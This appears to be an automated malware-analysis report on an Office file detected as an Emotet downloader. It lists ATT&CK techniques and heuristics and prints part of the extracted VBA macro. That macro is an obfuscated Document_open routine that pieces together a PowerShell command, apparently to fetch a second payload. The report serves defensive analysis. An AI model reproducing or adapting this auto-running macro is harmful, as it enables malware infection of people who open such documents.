MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers the execution of the 'Shell()' function, which is a critical finding. ClamAV also identified this as Emotet, a known downloader family. The VBA code appears to construct and execute a command, likely for downloading a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6877387-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877387-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34378 bytes |
SHA-256: c703ce42fb1bd5af4d545b2ea2221073e7f61f1ecffb61c8d924a8e1e93e6cc2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JaiaQVojf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw))
RnjVa = (75958 + oCMEUs / (59501 + ahsvJz))
LskzA = (23602 + MLcpC / (44497 + QiLQb))
wiZiCw = (64024 + zTvqtI / (60967 + BojSrp))
jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ)
dRlrK = (55008 + wjIKHb / (61905 + hMiwm))
vRckqT = (84186 + dKYus / (37498 + pGrNR))
End Sub
Attribute VB_Name = "DDpRztH"
Function WwJffLf()
On Error Resume Next
HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh)
VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + " "
cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX)))
cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36"
WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB
vuJEa = (20041 / 70192 * (HsUDk * tUdpWN - hFzwWs / ZRVtsz * (44796 + 82943 / 2114 - DjmGJ)))
DAQut = (96047 / 1210 * (RaNpJ * ESDrp - aKmFC / Elqbr * (47292 + 59454 / 94240 - VbmjTU)))
End Function
Function MdPizjV()
On Error Resume Next
JBrRz = (27846 / 66036 * (TDbsN * rZtPh - ipKMOj / RLWCEj * (29469 + 92917 / 2072 - nmbsdF)))
cKzlVE = (53518 / 52363 * (ZzsJB * IVbjo - kHnpoz / wBEHLY * (74343 + 62023 / 1164 - HBVdb)))
BHQvG = (51519 / 10071 * (lpUqiC * XRCzB - IwOqz / dFwEj * (67931 + 83939 / 25561 - aWFvwQ)))
aRfkCNHzz = "" + RZRwZVjJqr + vhHjiGVq + "q106" + OYIBUiTGIwtU + dAcjaBiudq + "f105" + uozVnDnjKto + wpjiEQb + "w9" + DiimQfDTuRdu + HnKqjqNkLDi + "9z6" + wMZZwQLk + BmIdqwXuGKKbu + "1q11"
vTVTTa = (7818 / 78696 * (EHVrh * cumzJD - MXlnJ / QBXRfz * (1506 + 92772 / 80798 - BQzzp)))
cfNciP = zkWXGz * fRcYRh * qsjhmd - jLFino - (Ivwil * Tucdps / WzUZXs + mnhuvm)
nujJVSzRv = "" + QpTIYXVdpf + vQDsutOhrj + "0%1" + wVVODnzdDVLnWj + drkrtWrWdCAspj + "01" + iXMCCHZBjVSZ + WKiPDzwSC + "!1" + wkBmGnUoaJw + wWRiLXDR + "19" + jqJafhoLV + DWYPZhwliG + "m45z"
bShiOH = WMhWVw * NoGmzd * jtAtSl - EjmIID - (HwzZEq * LWzCT / TKirIu + rZjov)
SjuOMs = FqHMt * WXWAqz * WuCvz - CriRK - (iCwfcl * aOOTWf / GfTCj + vNRYdz)
fNmAb = "" + WWZwiLlZstOAY + afPlHWXf + "11" + iUkYCdWs + ruazCVFbIRzWT + "1m98" + zjdqTzrojzqAAq + IoBRfFSilRwXS + "f10" + BbaEutBQ + GqzLVFk + "6V10" + oiRrSrQuFC + VUnpYZlWwH + "1f" + RZPVWQLL + adjkIMdwwOpjk + "99%" + WwfwWbhK + tcvYoqrpctK + "116w"
RZszLJ = lotLA * jMHRt * aJPki - HXwqIc - (QHOZic * AppFj / YUKihL + rfiCp)
RViOhsnSGTB = "" + lUufQMj + ndpWSlUJA + "32c7" + mNUIzcH + LkUCSOUuZSX + "8q1" + rrEWdYtK + LWRXAlioEwjGC + "01" + DEQZkibNdWdE + jrSTwJfBqUJqiS + "G116" + loujZUdkHF + nBXjHpVG + "V46%" + FzGCNvQtDJXE + JqYPNhLqZWOoz + "87f1" + pzjHwivdXHhU + aliRiWQ + "01%9" + tjaOajn + oKOLozlFONBIjN + "8w" + zkjXOFSYrqYXT + kijfEnOzlfdIDP + "67"
Wdabz = Ajirp * zYNlt * QZwht - kmvsk - (PJtdCu * tucizz / wuAMR + OjwYQo)
qMMIw = cjaUWT * zYorwk * Cpmjas - fKVNNK - (CiQZA * jRUjp / AOKKhT + CWBad)
boNazbTKizi = "" + zVFHIJX + XRwYzkVGtcrUU + "V1"
tJHzBH = ruJmvP * jpdRT * QXfFmj - jFOic - (RNzBa * jkZBPL / FhMnOD + NYWiC)
bHVOWEOSPV = "" + ElfbJZwLhnCVk + VPtwamWSzicIs + "08%1" + zPaufnVoCP + fzMhPKhAOI + "05" + ChTjwjRFTNnmvq + AbrhSPr + "c1" + zMzLrFrBfswUp + wCCSMZlZni + "01%1" + RjcmqAszUTtcH + QzYiKiVjPNZG + "10%" + mKhqSaUC + TwtBiJZK + "116G" + VcPvpEvzMYQui + JMloVROqQONp + "59" + GnOpaqK + BNfXphrZRFUV + "m36"
WvWHlz = (bObtGl / FEwWO - kbqtYI * pvjzi) * (zstDj + vEZwD - 57544 + woUNIz)
hLcbnphmw = "" + vFcicar + cKvlKLANwSW + "z70q" + mQoM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.